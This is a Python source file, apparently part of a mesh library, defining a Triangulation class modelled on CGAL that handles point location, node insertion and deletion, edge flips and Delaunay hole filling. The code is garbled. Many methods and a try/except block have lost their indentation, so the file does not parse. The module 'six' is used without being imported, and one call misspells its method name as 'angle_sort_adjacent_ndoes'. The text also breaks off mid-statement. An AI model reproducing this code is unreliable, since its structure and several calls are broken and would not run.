import numpy as np
import matplotlib.pyplot as plt
# do these work in py2?
from ..spatial import robust_predicates
from . import unstructured_grid
from ..utils import (circular_pairs, dist, point_segment_distance, set_keywords,
segment_segment_intersection)
if six.PY3:
    def cmp(a, b):
        """Python-2-style three-way comparison: -1 if a<b, 0 if neither
        ordering holds, 1 if a>b."""
        if a < b:
            return -1
        if a > b:
            return 1
        return 0
try:
from scipy import spatial
except ImportError:
spatial=None
class DuplicateNode(Exception):
    """Raised when a new node coincides with an existing vertex (see
    tri_insert, loc_type IN_VERTEX)."""
    pass
class BadConstraint(Exception):
    """Base class for constraint-insertion failures.  Extra keyword
    arguments are attached to the instance via set_keywords."""
    def __init__(self,*a,**k):
        super(BadConstraint,self).__init__(*a)
        set_keywords(self,k)
class IntersectingConstraints(BadConstraint):
    """Raised when a requested constraint would cross an existing
    constrained edge."""
    edge=None  # the offending edge, when known
class DuplicateConstraint(BadConstraint):
    """Raised when the requested constraint already exists."""
    nodes=None  # the node pair of the duplicate constraint, when known
class ConstraintCollinearNode(IntersectingConstraints):
    """
    Special case of intersections, when a constraint attempts to
    run *through* an existing node
    """
    node=None  # the node the constraint would pass through
def ordered(x1,x2,x3):
    """
    Given three collinear points, return True when x2 lies between x1 and
    x3 along their common line (i.e. the points appear in order).
    """
    # Pick a coordinate along which the line actually varies.
    axis = 0 if x1[0] != x2[0] else 1
    return (x1[axis] < x2[axis]) == (x2[axis] < x3[axis])
def rel_ordered(x1,x2,x3,x4):
    """
    Given four collinear points, return True when the direction x1->x2
    matches the direction x3->x4.  Requires x1!=x2 and x3!=x4.
    """
    # Pick a coordinate along which the line actually varies.
    axis = 0 if x1[0] != x2[0] else 1
    assert x1[axis] != x2[axis]
    assert x3[axis] != x4[axis]
    return (x1[axis] < x2[axis]) == (x3[axis] < x4[axis])
class Triangulation(unstructured_grid.UnstructuredGrid):
    """
    Mimics the Triangulation_2 class of CGAL.
    note that we make some additional assumptions on invariants -
    nodes, cells and edges are ordered in a consistent way:
    """
    # Sentinel node index standing in for CGAL's "infinite" vertex.
    INF_NODE=-666
    # Sentinel cell index for the unbounded face outside the convex hull.
    INF_CELL=unstructured_grid.UnstructuredGrid.UNMESHED
    max_sides=3
    # local exception types
    DuplicateNode=DuplicateNode
    IntersectingConstraints=IntersectingConstraints
    BadConstraint=BadConstraint
    ConstraintCollinearNode=ConstraintCollinearNode
    post_check=False # enables [expensive] checks after operations
    # np.bool_ replaces the deprecated np.bool8 alias (deprecated in
    # numpy 1.24, removed in 2.0); the two name the same dtype, so
    # existing edge data is unaffected.
    edge_dtype=(unstructured_grid.UnstructuredGrid.edge_dtype +
                [ ('constrained',np.bool_) ] )
def add_node(self,**kwargs):
# will eventually need some caching or indexing to make
# the locate faster. locate() happens first so that
# the mesh complies with invariants and doesn't have a dangling
# node
loc=self.locate(kwargs['x'])
n=super(Triangulation,self).add_node(**kwargs)
self.tri_insert(n,loc)
return n
    def modify_node(self,n,_brute_force=False,**kwargs):
        """Modify node n; when 'x' moves, repair the triangulation.

        _brute_force: if True, move node by delete/add, rather than trying
        a short cut.  The shortcut applies when the moved node stays inside
        its adjacent cells (and keeps the convex hull valid); otherwise the
        node is deleted and re-added, restoring its constraints, with a
        rollback to the old position if the constraints cannot be restored.
        """
        if 'x' not in kwargs:
            # no geometry change: base class handles it entirely
            return super(Triangulation,self).modify_node(n,**kwargs)
        old_rec=self.nodes[n]
        # Brute force, removing and re-adding, is no good as the
        # constraints are lost.
        # A slightly more refined, but still brutish, approach, is to save
        # the constraints, delete, add, add constraints.
        # be sped up
        # handle a common case where the node is only moved a small
        # distance, such that we only have to do a small amount of
        # work to fix up the triangulation
        # if the new location is inside a cell adjacent to n, then
        # we can [probably?] move the node
        if self.dim()<2:
            # the short cuts are only written for the 2D case.
            _brute_force=True
        if not _brute_force:
            # check whether new node location is on the "right" side
            # of all existing "opposite" edges (the edge of each cell
            # which doesn't contain n.
            shortcut=True
            if shortcut:
                my_cells=self.node_to_cells(n)
                for c in my_cells:
                    c_nodes=self.cells['nodes'][c]
                    c_xy=self.nodes['x'][c_nodes]
                    # rebuild the cell's corner list with n at its new spot
                    pnts=[]
                    for i,c_node in enumerate(c_nodes):
                        if c_node==n:
                            pnts.append(kwargs['x'])
                        else:
                            pnts.append(c_xy[i])
                    # any non-CCW cell means the move flips/degenerates it
                    if robust_predicates.orientation(*pnts) <=0:
                        shortcut=False
            if shortcut:
                # also check for this node being on the convex hull
                # find the pair of edges, if they exist, which have
                # n, and have the infinite cell to the left.
                he_rev=he_fwd=None
                for j in self.node_to_edges(n):
                    if self.edges['cells'][j,1]==self.INF_CELL:
                        he=self.halfedge(j,1)
                    elif self.edges['cells'][j,0]==self.INF_CELL:
                        he=self.halfedge(j,0)
                    else:
                        continue
                    if he.node_fwd()==n:
                        he_rev=he
                    elif he.node_rev()==n:
                        he_fwd=he
                    else:
                        assert False
                # can't have just one.
                assert (he_rev is None) == (he_fwd is None)
                if he_rev is not None:
                    # need to check that the movement of this node does
                    # not invalidate the orientation with respect to
                    # neighboring edges of the convex hull.
                    # get the five consecutive points, where c is the
                    # node being moved. make sure that a-b-c and c-d-e
                    # are properly oriented
                    cons_idxs=[he_rev.rev().node_rev(),
                               he_rev.node_rev(),
                               n,
                               he_fwd.node_fwd(),
                               he_fwd.fwd().node_fwd()]
                    abcde=self.nodes['x'][cons_idxs]
                    abcde[2]=kwargs['x']
                    if robust_predicates.orientation(*abcde[:3])>0:
                        shortcut=False
                    elif robust_predicates.orientation(*abcde[2:])>0:
                        shortcut=False
                    elif robust_predicates.orientation(*abcde[1:4])>0:
                        shortcut=False
            if shortcut:
                # short cut should work:
                retval=super(Triangulation,self).modify_node(n,**kwargs)
                self.restore_delaunay(n)
                # when refining the above tests, uncomment this to increase
                # the amount of validation
                # if self.check_convex_hull():
                #     pdb.set_trace()
                return retval
        # but adding the constraints back can fail, in which case we should
        # roll back our state, and fire an exception.
        constraints_to_replace=[]
        for j in self.node_to_edges(n):
            if self.edges['constrained'][j]:
                constraints_to_replace.append( self.edges['nodes'][j].copy() )
        old_x=self.nodes['x'][n].copy() # in case of rollback
        self.delete_node(n)
        # carry over all other fields of the old record that the caller
        # didn't explicitly override
        for fld in old_rec.dtype.names:
            if fld not in ['x','deleted'] and fld not in kwargs:
                kwargs[fld]=old_rec[fld]
        new_n=self.add_node(_index=n,**kwargs)
        try:
            for n1,n2 in constraints_to_replace:
                self.add_constraint(n1,n2) # This can fail!
        except self.IntersectingConstraints as exc:
            self.log.warning("modify_node: intersecting constraints - rolling back")
            self.delete_node(n)
            kwargs['x']=old_x # move it back to where it started
            new_n=self.add_node(_index=n,**kwargs)
            for n1,n2 in constraints_to_replace:
                self.add_constraint(n1,n2) # This should not fail
            # but signal to the caller that the modify failed
            raise
        assert new_n==n
def add_edge(self,**kw):
""" add-on: cells default to INF_CELL, not -1.
"""
j=super(Triangulation,self).add_edge(**kw)
if 'cells' not in kw:
self.edges[j]['cells'][:]=self.INF_CELL
return j
def choose_start_cell(self,t=None):
""" choose a starting cell for trying to locate where a new vertex
should go. May return INF_CELL if there are no valid cells.
t: can specify a target point which may be used with a spatial index
to speed up the query.
"""
c=0
try:
while self.cells['deleted'][c]:
c+=1
return c
except IndexError:
return self.INF_CELL
IN_VERTEX=0
IN_EDGE=2
IN_FACE=3
OUTSIDE_CONVEX_HULL=4
OUTSIDE_AFFINE_HULL=5
def dim(self):
if len(self.cells) and not np.all(self.cells['deleted']):
return 2
elif len(self.edges) and not np.all(self.edges['deleted']):
return 1
elif len(self.nodes) and not np.all(self.nodes['deleted']):
return 0
else:
return -1
def angle_sort_adjacent_nodes(self,n,ref_nbr=None,topo=True):
if topo:
return self.topo_sort_adjacent_nodes(n,ref_nbr)
else:
return super(Triangulation,self).angle_sort_adjacent_ndoes(n,ref_nbr=ref_nbr)
    def topo_sort_adjacent_nodes(self,n,ref_nbr=None):
        """ like angle_sort_adjacent_nodes, but relying on topology, not geometry.

        Builds a successor map keyed by the cell opposite each half-edge
        out of n, then walks it to recover the cyclic neighbor order.
        When ref_nbr is given, the result is rolled so it starts there.
        """
        nbrs=list(self.node_to_nodes(n))
        if len(nbrs)<3:
            # with <3 neighbors there is only one cyclic order
            snbrs=nbrs
        else:
            he_nbrs = [ self.nodes_to_halfedge(n,nbr)
                        for nbr in nbrs ]
            map_next={}
            for he in he_nbrs:
                # this doesn't use angle_sort
                c=he.cell_opp()
                map_next[c] = (he.node_fwd(),he.cell())
                # trav0 ends up seeded from the last half-edge visited
                trav0=trav=c
            snbrs=[]
            while 1:
                #if len(snbrs)>20: # DBG
                #    pdb.set_trace()
                node,cell = map_next[trav]
                snbrs.append(node)
                trav=cell
                if trav==trav0:
                    break
        if ref_nbr is not None:
            i=list(snbrs).index(ref_nbr)
            snbrs=np.roll(snbrs,-i)
        return snbrs
    def locate(self,t,c=None):
        """ t: [x,y] point to locate
        c: starting cell, if known
        return loc=[face,loc_type,loc_index]
        face: INF_CELL if t is not on or inside a finite cell
        loc_type:
          OUTSIDE_AFFINE_HULL: adding this vertex will increase the dimension of the triangulation.
            empty triangulation: dim=-1
            single vertex: dim=0
            collinear edges: dim=1
            faces: dim=2
            loc_index set to current dimensionality
          OUTSIDE_CONVEX_HULL: dimensionality may still be 1 or 2.
            if the dimension is 1, then loc_index gives the nearest node
            if the dimension is 2, then loc_index gives an adjacent half-edge
          IN_VERTEX: t coincides with existing vertex,
            if face is finite, then it's a cell containing the vertex, and loc_index
            is the index of that vertex in the cell.
            if face is INF_CELL, implies dimension<2, and loc_index gives existing node
          IN_EDGE: t is collinear with existing edge.
            if face is finite, it is a cell containing the edge.
            loc_index is the index of the edge itself.
            face may be INF_CELL, which implies dimension<2
          IN_FACE: t is in the interior of a face. face is the containing cell. loc_index
            is not used.
        """
        # NOTE(review): `or` treats c==0 as "not given" and re-chooses a
        # start cell; harmless since any valid cell works as a start.
        c=c or self.choose_start_cell(t)
        prev=None # previous face
        # To identify the right orientation of the half-edge, remember
        # the ordering of the nodes -- this is CCW ordering from the
        # perspective of prev
        last_nodes=None
        last_edge=None # the edge between c and prev
        # Checks for affine hull -
        # 3rd element gives the current dimensionality of the affine hull
        if self.Nnodes_valid()==0:
            return (self.INF_CELL,self.OUTSIDE_AFFINE_HULL,-1)
        elif self.Nedges_valid()==0:
            return (self.INF_CELL,self.OUTSIDE_AFFINE_HULL,0)
        elif self.Ncells_valid()==0:
            return self.locate_1d(t,c)
        # 2-D case: walk from cell to cell, always crossing an edge that
        # has t strictly on its far (CW) side, until t is in/on a cell or
        # we step off the convex hull.
        while True:
            if c==self.INF_CELL:
                # // c must contain t in its interior
                # lt = OUTSIDE_CONVEX_HULL;
                # li = c->index(infinite_vertex());
                # Changed to give adjacent edge, rather than
                # confusing loc_index=4
                # loc=(self.INF_CELL,self.OUTSIDE_CONVEX_HULL,last_edge)
                # changed again, to give a half-edge
                # flip the order because they were in the order with respect
                # to the prev face, but now we jumped over last_edge
                he=self.nodes_to_halfedge( last_nodes[1],last_nodes[0] )
                loc=(self.INF_CELL,self.OUTSIDE_CONVEX_HULL,he)
                return loc
            p0=self.nodes['x'][self.cells['nodes'][c,0]]
            p1=self.nodes['x'][self.cells['nodes'][c,1]]
            p2=self.nodes['x'][self.cells['nodes'][c,2]]
            prev = c
            # Orientation o0, o1, o2;
            # nodes are stored in CCW order for the cell.
            # 1st edge connects first two nodes
            # neighboring cells follow the edges
            o0 = robust_predicates.orientation(p0,p1,t)
            if o0 == -1: # CW
                last_edge=self.cell_to_edges(c)[0]
                last_nodes=self.cells['nodes'][c,[0,1]]
                c=self.cell_to_cells(c)[0]
                continue
            o1 = robust_predicates.orientation(p1,p2,t)
            if o1 == -1:
                last_edge=self.cell_to_edges(c)[1]
                last_nodes=self.cells['nodes'][c,[1,2]]
                c=self.cell_to_cells(c)[1]
                continue
            o2 = robust_predicates.orientation(p2,p0,t)
            if o2 == -1:
                last_edge=self.cell_to_edges(c)[2]
                last_nodes=self.cells['nodes'][c,[2,0]]
                c=self.cell_to_cells(c)[2]
                continue
            # must be in or on a face --
            break
        # For simplicity, I'm skipping some optimizations which avoid re-checking
        # the previous edge.  see Triangulation_2.h:2616
        # now t is in c or on its boundary
        # count how many of the three edges t is exactly on:
        # 0 -> interior, 1 -> on an edge, 2 -> on a vertex
        o_sum=(o0==0)+(o1==0)+(o2==0)
        if o_sum==0:
            loc=(c,self.IN_FACE,4)
        elif o_sum==1:
            if o0==0:
                j=0
            elif o1==0:
                j=1
            else:
                j=2
            # better to consistently return the edge index here, not
            # just its index in the cell
            loc=(c,self.IN_EDGE,self.cells['edges'][c,j])
        elif o_sum==2:
            # the vertex is the corner opposite the one non-zero edge
            if o0!=0:
                loc=(c,self.IN_VERTEX,2)
            elif o1!=0:
                loc=(c,self.IN_VERTEX,0)
            else:
                loc=(c,self.IN_VERTEX,1)
        else:
            assert False
        return loc
    def locate_1d(self,t,c):
        """Point location in a 1-D (collinear-edges) triangulation.

        Returns the same (face, loc_type, loc_index) tuples as locate():
        OUTSIDE_AFFINE_HULL when t is off the line, IN_EDGE when t falls
        within an edge, OUTSIDE_CONVEX_HULL (with the nearest end node)
        when t is beyond either end of the line.
        """
        # There are some edges, and t may fall within an edge, off the end,
        # or off to the side.
        j=six.next(self.valid_edge_iter())
        p0=self.nodes['x'][ self.edges['nodes'][j,0] ]
        p1=self.nodes['x'][ self.edges['nodes'][j,1] ]
        o=robust_predicates.orientation(p0,p1,t)
        if o!=0:
            # off the line entirely: adding t would make the mesh 2-D
            return (self.INF_CELL,self.OUTSIDE_AFFINE_HULL,1)
        # t is collinear - need to find out whether it's in an edge
        # or not
        # choose a coordinate which varies along the line
        if p0[0]!=p1[0]:
            coord=0
        else:
            coord=1
        if (t[coord]<p0[coord]) != (t[coord]<p1[coord]):
            return (self.INF_CELL,self.IN_EDGE,j)
        # do we need to go towards increasing or decreasing coord?
        if (t[coord]<p0[coord]) and (t[coord]<p1[coord]):
            direc=-1
        else:
            direc=1
        while True:
            # j indexes the edge we just tested.
            # p0 and p1 are the endpoints of the edge
            # 1. do we want a neighbor of n0 or n1?
            if direc*cmp(p0[coord],p1[coord]) < 0: # want to go towards p1
                n_adj=self.edges['nodes'][j,1]
            else:
                n_adj=self.edges['nodes'][j,0]
            for jnext in self.node_to_edges(n_adj):
                if jnext!=j:
                    j=jnext
                    break
            else:
                # walked off the end of the line -
                # n_adj is the nearest to us
                return (self.INF_CELL,self.OUTSIDE_CONVEX_HULL,n_adj)
            p0=self.nodes['x'][ self.edges['nodes'][j,0] ]
            p1=self.nodes['x'][ self.edges['nodes'][j,1] ]
            if (t[coord]<p0[coord]) != (t[coord]<p1[coord]):
                return (self.INF_CELL,self.IN_EDGE,j)
def tri_insert(self,n,loc):
# n: index for newly inserted node.
# note that loc must already be computed -
# types of inserts:
# on an edge, inside a face, outside the convex hull
# outside affine hull
loc_c,loc_type,loc_idx = loc
if loc_type==self.IN_FACE:
self.tri_insert_in_face(n,loc)
elif loc_type==self.IN_EDGE:
self.tri_insert_in_edge(n,loc)
elif loc_type==self.IN_VERTEX:
raise DuplicateNode()
elif loc_type==self.OUTSIDE_CONVEX_HULL:
self.tri_insert_outside_convex_hull(n,loc)
elif loc_type==self.OUTSIDE_AFFINE_HULL:
self.tri_insert_outside_affine_hull(n,loc)
# for some of those actions, this could be skipped
self.restore_delaunay(n)
def tri_insert_in_face(self,n,loc):
loc_f,loc_type,_ = loc
a,b,c=self.cells['nodes'][loc_f]
self.delete_cell(loc_f)
self.add_edge(nodes=[n,a])
self.add_edge(nodes=[n,b])
self.add_edge(nodes=[n,c])
self.add_cell(nodes=[n,a,b])
self.add_cell(nodes=[n,b,c])
self.add_cell(nodes=[n,c,a])
    def tri_insert_in_edge(self,n,loc):
        """ Takes care of splitting the edge and any adjacent cells

        The edge a-c is replaced by a-b and b-c (b being the new node n),
        and each adjacent cell is split in two through b.
        """
        loc_f,loc_type,loc_edge = loc
        self.log.debug("Loc puts new vertex in edge %s"%loc_edge)
        cells_to_split=[]
        for c in self.edge_to_cells(loc_edge):
            if c<0: continue
            # keep a copy of the cell record; the cell itself must be
            # deleted before the edge can be removed
            cells_to_split.append( self.cells[c].copy() )
            self.log.debug("Deleting cell on insert %d"%c)
            self.delete_cell(c)
        # Modify the edge:
        a,c=self.edges['nodes'][loc_edge]
        b=n
        self.delete_edge(loc_edge)
        self.add_edge(nodes=[a,b])
        self.add_edge(nodes=[b,c])
        for cell_data in cells_to_split:
            # the cell node opposite the split edge.  NOTE: the
            # comprehension's `n` shadows the parameter only inside the
            # comprehension (Python 3 scoping).
            common=[n for n in cell_data['nodes']
                    if n!=a and n!=c][0]
            jnew=self.add_edge(nodes=[b,common])  # jnew itself is unused
            # two half-cells: original nodes with a (resp. c) replaced by b
            for replace in [a,c]:
                nodes=list(cell_data['nodes'])
                idx=nodes.index(replace)
                nodes[idx]=b
                self.add_cell(nodes=nodes)
def tri_insert_outside_convex_hull(self,n,loc):
dim=self.dim()
if dim==2:
self.tri_insert_outside_convex_hull_2d(n,loc)
elif dim==1:
self.tri_insert_outside_convex_hull_1d(n,loc)
else:
assert False
def tri_insert_outside_convex_hull_1d(self,n,loc):
self.log.debug("tri_insert_outside_convex_hull_1d")
n_adj=loc[2]
self.add_edge(nodes=[n,n_adj])
    def tri_insert_outside_convex_hull_2d(self,n,loc):
        """Attach n outside the convex hull by fanning triangles from n to
        every hull edge that is visible from n (CCW test passes)."""
        # HERE:
        #  the CGAL code is a little funky because of the use of
        #  infinite vertices and the like.
        #  the plan here:
        #  a. change 'locate' to return halfedges instead of just an
        #     edge.  otherwise we'd have to redo the orientation check here.
        #  b. traverse the half-edge forwards and backwards, accumulating
        #     lists of adjacent edges which also satisfy the CCW rule.
        #  c. create triangles with n and the given half-edge, as well as the
        #     accumulated adjacent edges
        #  the result then is that the convex hull is built out.
        # Triangulation_2.h:1132
        assert loc[0]==self.INF_CELL # sanity.
        he0=loc[2] # adjacent half-edge
        def check_halfedge(he):
            # True when the hull edge he is "visible" from n, i.e.
            # (rev, fwd, n) makes a CCW triangle
            nodes=[he.node_rev(),he.node_fwd(),n]
            pnts=self.nodes['x'][nodes]
            ccw=robust_predicates.orientation(pnts[0],pnts[1],pnts[2])
            return ccw>0
        assert check_halfedge(he0)
        # gather additional visible hull edges in both directions
        addl_fwd=[]
        he=he0.fwd()
        while check_halfedge(he):
            addl_fwd.append(he)
            he=he.fwd()
        addl_rev=[]
        he=he0.rev()
        while check_halfedge(he):
            addl_rev.append(he)
            he=he.rev()
        self.add_edge( nodes=[he0.node_rev(),n] )
        self.add_edge( nodes=[he0.node_fwd(),n] )
        self.add_cell( nodes=[he0.node_rev(),he0.node_fwd(),n] )
        for he in addl_fwd:
            self.add_edge( nodes=[he.node_fwd(),n] )
            # the second node *had* been ne0.node_fwd(), but that
            # was probably a typo.
            self.add_cell( nodes=[he.node_rev(),he.node_fwd(),n] )
        for he in addl_rev:
            self.add_edge( nodes=[he.node_rev(),n] )
            # same here.
            self.add_cell( nodes=[he.node_rev(),he.node_fwd(),n] )
        # 1. Check orientation.  Since we get an unoriented edge j_adj,
        #    all we can do is assert that the points are not collinear.
        # 2. loops through faces incident to infinite vertex (?)
        #    gathering a list of external edges which make a CCW triangle
        #    with the vertex to insert.  stop on the first edge which fails this.
        #    This is done first traversing CCW, then again traversing CW
        # 3. Make the new face with the given edge..
        #
    def tri_insert_outside_affine_hull(self,n,loc):
        """Insert node n when it raises the dimensionality of the mesh:
        -1 -> 0 (first node, nothing to do), 0 -> 1 (connect the two
        nodes), 1 -> 2 (connect n to all nodes and triangulate every
        previously-existing edge against n)."""
        self.log.debug("Insert outside affine hull")
        loc_face,loc_type,curr_dim = loc
        if curr_dim==-1:
            self.log.debug(" no nodes, no work")
        elif curr_dim==0:
            self.log.debug(" simply add edge")
            for nbr in self.valid_node_iter():
                if nbr != n:
                    self.add_edge(nodes=[n,nbr])
        elif curr_dim==1:
            self.log.debug(" add edges and cells")
            # the strategy in Triangulation_2.h makes some confusing
            # use of the infinite face - take a less elegant, more explicit
            # approach here
            orig_edges=list(self.valid_edge_iter())
            for nbr in self.valid_node_iter():
                if nbr != n:
                    self.add_edge(nodes=[n,nbr])
            for j in orig_edges:
                n1,n2=self.edges['nodes'][j]
                self.add_cell( nodes=[n,n1,n2] )
        else:
            assert False
    def add_cell(self,_force_invariants=True,**kwargs):
        """Add a triangular cell, by default enforcing CCW node order and
        populating the cell's edge list, then fixing the edge->cell links."""
        if _force_invariants:
            nodes=kwargs['nodes']
            # Make sure that topological invariants are maintained:
            # nodes are ordered ccw.
            # edges are populated
            # used to assume/force the edges to be sequenced opposite nodes.
            # but that is a triangulation-specific assumption, while we're using
            # a general unstructured_grid base class. The base class makes
            # an incompatible assumption, that the first edge connects the first
            # two nodes.
            pnts=self.nodes['x'][nodes]
            ccw=robust_predicates.orientation(pnts[0],pnts[1],pnts[2])
            assert ccw!=0
            if ccw<0:
                # reverse to make the triangle CCW
                nodes=nodes[::-1]
                kwargs['nodes']=nodes
            j0=self.nodes_to_edge(nodes[0],nodes[1])
            j1=self.nodes_to_edge(nodes[1],nodes[2])
            j2=self.nodes_to_edge(nodes[2],nodes[0])
            kwargs['edges']=[j0,j1,j2]
        c=super(Triangulation,self).add_cell(**kwargs)
        # update the link from edges back to cells
        for ji,j in enumerate(self.cells['edges'][c]):
            # used to attempt to enforce this:
            # ji-th edge is the (ji+1)%3,(ji+2)%3 nodes of the cell
            # but that's not compatible with checks in unstructured_grid
            # but need to know if the edge is in that order or the
            # opposite
            if self.edges['nodes'][j,0] == self.cells['nodes'][c,ji]:
                self.edges['cells'][j,0] = c
            else:
                self.edges['cells'][j,1] = c
        return c
    def flip_edge(self,j):
        """
        Rotate the given edge CCW (the classic Delaunay edge flip).
        Requires that triangular cells exist on both sides of the edge
        (that's not a hard and fast requirement, just makes it easier
        to implement. There *does* have to be a potential cell on either
        side).
        Returns the pair of new cell indices (left, right).
        """
        c_left,c_right=self.edges['cells'][j,:]
        self.log.debug("Flipping edge %d, with cells %d, %d   nodes %d,%d"%(j,c_left,c_right,
                                                                            self.edges['nodes'][j,0],
                                                                            self.edges['nodes'][j,1]) )
        assert c_left>=0 # could be relaxed, at the cost of some complexity here
        assert c_right>=0
        # could work harder to preserve extra info:
        #c_left_data = self.cells[c_left].copy()
        #c_right_data = self.cells[c_right].copy()
        # This is dangerous! - deleting the cells means that topo_sort is no good,
        # and that breaks half-edge ops.
        # moving to happen a bit later -
        # self.delete_cell(c_left)
        # self.delete_cell(c_right)
        he_left=unstructured_grid.HalfEdge(self,j,0)
        he_right=unstructured_grid.HalfEdge(self,j,1)
        # quad corners: na-nc is the edge being flipped, nb/nd are the
        # opposite vertices of the two adjacent triangles
        na,nc = self.edges['nodes'][j]
        nd=he_left.fwd().node_fwd()
        nb=he_right.fwd().node_fwd()
        # DBG
        if 0:
            for n,label in zip( [na,nb,nc,nd],
                                "abcd" ):
                plt.text( self.nodes['x'][n,0],
                          self.nodes['x'][n,1],
                          label)
        # keep the time where the cells are deleted to a minimum
        self.delete_cell(c_left)
        self.delete_cell(c_right)
        # the edge now connects the two opposite vertices instead
        self.modify_edge(j,nodes=[nb,nd])
        new_left =self.add_cell(nodes=[na,nb,nd])
        new_right=self.add_cell(nodes=[nc,nd,nb])
        return new_left,new_right
def delete_node(self,n):
""" Triangulation version implies cascade, but also
patches up the triangulation
"""
assert n>=0
N=self.Nnodes_valid()
if N==1:
super(Triangulation,self).delete_node(n)
elif N==2:
j=self.node_to_edges(n)[0]
self.delete_edge(j)
super(Triangulation,self).delete_node(n)
elif self.dim()==1:
self.delete_node_1d(n)
else:
self.delete_node_2d(n)
def delete_node_1d(self,n):
# Triangulation_2.h hands this off to the triangulation data structure
# That code looks like:
assert self.dim() == 1
assert self.Nnodes_valid() > 2
# Two cases - either n is at the end of a line of nodes,
# or it's between two nodes.
nbrs=self.node_to_nodes(n)
if len(nbrs)==1: # easy, we're at the end
j=self.nodes_to_edge(n,nbrs[0])
self.delete_edge(j)
super(Triangulation,self).delete_node(n)
else:
assert len(nbrs)==2
j1=self.nodes_to_edge(n,nbrs[0])
j2=self.nodes_to_edge(n,nbrs[1])
self.delete_edge(j1)
self.delete_edge(j2)
super(Triangulation,self).delete_node(n)
self.add_edge( nodes=nbrs )
def test_delete_node_dim_down(self,n):
# see Triangulation_2.h : test_dim_down
# test the dimensionality of the resulting triangulation
# upon removing of vertex v
# it goes down to 1 iff
# 1) any finite face is incident to v
# 2) all vertices are collinear
assert self.dim() == 2
for c in self.valid_cell_iter():
if n not in self.cell_to_nodes(c):
# There is a triangle not involving n
# deleting n would retain a 2D triangulation
return False
pnts=[self.nodes['x'][i]
for i in self.valid_node_iter()
if i!=n]
a,b = pnts[:2]
for c in pnts[2:]:
if robust_predicates.orientation(a,b,c) != 0:
return False
return True
    def delete_node_2d(self,n):
        """ Delete node n from a 2-D triangulation.  Either the whole
        triangulation degenerates to 1-D (all cells were incident to n),
        or a hole is cut around n and retriangulated.
        """
        if self.test_delete_node_dim_down(n):
            # deleting n yields a 1D triangulation - no faces
            for c in self.valid_cell_iter():
                self.delete_cell(c)
            # copy
            for j in list(self.node_to_edges(n)):
                self.delete_edge(j)
            super(Triangulation,self).delete_node(n)
            return
        # first, make a hole around n
        deletee=n
        # new way
        nbrs=self.angle_sort_adjacent_nodes(deletee)
        edges_to_delete=[]
        hole_nodes=[]
        for nbrA,nbrB in circular_pairs(nbrs):
            hole_nodes.append(nbrA)
            he=self.nodes_to_halfedge(nbrA,nbrB)
            # 'inf' marks a stretch of the hole boundary with no finite
            # cell between nbrA and nbrB around n (i.e. along the hull)
            if (he is None) or (he.cell()<0) or (n not in self.cell_to_nodes(he.cell())):
                hole_nodes.append('inf')
            edges_to_delete.append( self.nodes_to_edge( [deletee,nbrA] ) )
        for j in edges_to_delete:
            self.delete_edge_cascade(j)
        super(Triangulation,self).delete_node(deletee)
        # Use the boundary completion approach described in Devillers 2011
        # it's not terribly slow, and can be done with the existing
        # helpers.
        self.fill_hole(hole_nodes)
    def fill_hole(self,hole_nodes):
        """ Retriangulate the polygonal hole described by hole_nodes,
        a cyclic list of node indices where 'inf' marks stretches along
        the convex hull.  Boundary-completion approach (Devillers 2011):
        repeatedly pick an edge a-b of the hole, find the unique node c
        whose triangle a-b-c satisfies the in-circle test, emit that
        triangle, and recurse on the remaining sub-hole(s).
        """
        # track potentially multiple holes
        # a few place use list-specific semantics - not ndarray
        hole_nodes=list(hole_nodes)
        holes_nodes=[ hole_nodes ]
        while len(holes_nodes):
            hole_nodes=holes_nodes.pop()
            # rotate the hole so the leading pair a,b are both finite nodes
            while 'inf' in hole_nodes[:2]:
                hole_nodes = hole_nodes[1:] + hole_nodes[:1]
            a,b=hole_nodes[:2]
            self.log.debug("Considering edge %d-%d"%(a,b) )
            # inf nodes:
            # can't test any geometry. seems like we can only have boundary
            # faces if the hole included an inf node.
            # so drop it from candidates here, but remember that we saw it
            # first, sweep through the candidates to test CCW
            has_inf=False
            c_cand1=hole_nodes[2:]
            c_cand2=[]
            for c in c_cand1:
                if c=='inf':
                    has_inf=True
                elif robust_predicates.orientation( self.nodes['x'][a],
                                                    self.nodes['x'][b],
                                                    self.nodes['x'][c] ) > 0:
                    c_cand2.append(c)
            self.log.debug("After CCW tests, %s are left"%c_cand2)
            # narrow the CCW candidates with in-circle tests until one remains
            while len(c_cand2)>1:
                c=c_cand2[0]
                for d in c_cand2[1:]:
                    tst=robust_predicates.incircle( self.nodes['x'][a],
                                                    self.nodes['x'][b],
                                                    self.nodes['x'][c],
                                                    self.nodes['x'][d] )
                    if tst>0:
                        self.log.debug("%d was inside %d-%d-%d"%(d,a,b,c))
                        c_cand2.pop(0)
                        break
                else:
                    # c passed all the tests
                    c_cand2=[c]
                    break
            # if the hole nodes are already all convex, then they already
            # form the new convex hull - n was on the hull and simply goes
            # away
            if has_inf and not c_cand2:
                c_cand2=['inf']
                c='inf' # ensure c is bound for the comparisons below
            else:
                c=c_cand2[0]
            self.log.debug("Decided on %s-%s-%s"%(a,b,c))
            # n.b. add_cell_and_edges is probably what is responsible
            # for the painless dealing with collinear boundaries.
            if c!='inf':
                self.add_cell_and_edges( nodes=[a,b,c] )
            # what hole to put back on the queue?
            if len(hole_nodes)==3:
                # finished this hole.
                self.log.debug("Hole is finished")
                continue
            elif c==hole_nodes[2]:
                self.log.debug("Hole is trimmed from front")
                hole_nodes[:3] = [a,c]
                holes_nodes.append( hole_nodes )
            elif c==hole_nodes[-1]:
                self.log.debug("Hole is trimmed from back")
                hole_nodes=hole_nodes[1:] # drop a
                self.log.debug(" New hole is %s"%hole_nodes)
                holes_nodes.append( hole_nodes )
            else:
                self.log.debug("Created two new holes")
                # c splits the hole into two smaller holes, one on each
                # side of the new triangle a-b-c
                idx=hole_nodes.index(c)
                h1=hole_nodes[1:idx+1]
                h2=hole_nodes[idx:] + hole_nodes[:1]
                self.log.debug(" New hole: %s"%h1)
                self.log.debug(" New hole: %s"%h2)
                holes_nodes.append( h1 )
                holes_nodes.append( h2 )
# Make a check for the delaunay criterion:
def check_global_delaunay(self):
bad_checks=[] # [ (cell,node),...]
for c in self.valid_cell_iter():
nodes=self.cells['nodes'][c]
pnts=self.nodes['x'][nodes]
# brute force - check them all.
for n in self.valid_node_iter():
if n in nodes:
continue
t=self.nodes['x'][n]
check=robust_predicates.incircle(pnts[0],pnts[1],pnts[2],t)
if check>0:
# how do we check for constraints here?
# maybe more edge-centric?
# tests of a cell on one side of an edge against a node on the
# other is reflexive.
#
# could go through the edges of c,
msg="Node %d is inside the circumcircle of cell %d (%d,%d,%d)"%(n,c,
